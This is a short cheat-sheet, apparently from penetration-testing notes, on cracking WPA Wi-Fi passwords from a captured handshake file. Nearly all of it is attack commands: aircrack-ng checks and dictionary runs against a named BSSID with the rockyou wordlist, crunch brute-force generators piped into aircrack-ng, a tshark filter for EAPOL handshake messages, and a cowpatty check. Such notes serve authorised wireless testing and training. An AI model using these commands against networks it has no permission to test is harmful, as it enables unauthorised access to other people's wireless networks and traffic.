WPA Cracking

Now check if the handshake is in the file.

aircrack-ng

aircrack-ng psk-01.cap

Crunch

Try all {upperlowercases with all numbers} with a lenght of 8 spaces/characters :

crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - <Capture> -e <essid>

Try all posible number combinations:

crunch 8 8 1234567890 | aircrack-ng -w - <Capture> -e <essid>

tshark

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

Now continue to crack:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Last updated